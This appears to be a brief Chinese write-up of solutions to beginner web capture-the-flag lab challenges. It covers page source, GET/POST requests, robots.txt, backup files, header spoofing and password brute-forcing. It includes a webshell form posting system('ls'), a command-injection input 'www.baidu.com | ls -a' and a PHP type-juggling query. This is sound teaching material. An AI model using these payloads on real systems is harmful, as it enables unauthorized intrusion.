1 view_source
查看網頁源代碼,以谷歌瀏覽器爲例,可以右鍵查看,或者按F12
2 get_post
理解瀏覽器訪問服務器的兩種方式,
get方式
http://111.198.29.45:39414/?a=1
post方式
<body>
<h1>請用GET方式提交一個名爲a,值爲1的變量</h1>
<h1>請再以POST方式隨便提交一個名爲b,值爲2的變量</h1>
<form action="http://111.198.29.45:39414/?a=1" method="post">
<input type="text" name="b" value="2">
<input type="submit" value="submit">
</form>
</body>
3 robots
訪問robots.txt文檔,http://111.198.29.45:55292/robots.txt
4 backup
訪問服務器備份文件,http://111.198.29.45:35770/index.php.bak
5 cookie
查看瀏覽器上對某個網站的cookie,
6 disabled_button
修改網頁源代碼
<input class="btn btn-default" style="height:50px;width:200px;" type="submit" value="flag" name="auth">
7 simple_js
閱讀JS,發現答案,兩次ASCII轉碼
dechiffre("\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30")
8 xff_referer
分別修改xff和referer,貌似必須使用其他工具或插件
9 weak_auth
對用戶名和密碼進行爆破,貌似也必須使用工具
10 webshell
以POST的方式提交shell變量
<form action="http://111.198.29.45:33598/" method="post">
<input type="text" name="shell" value="system('ls');">
<input type="submit" value="submit">
</form>
11 command_execution
讓服務器執行多個命令 www.baidu.com | ls -a
12 simple_php
閱讀php後,以GET方式提交
http://111.198.29.45:44584/?a=0x0&b=12345p
後記:
網頁主頁名一般是index,default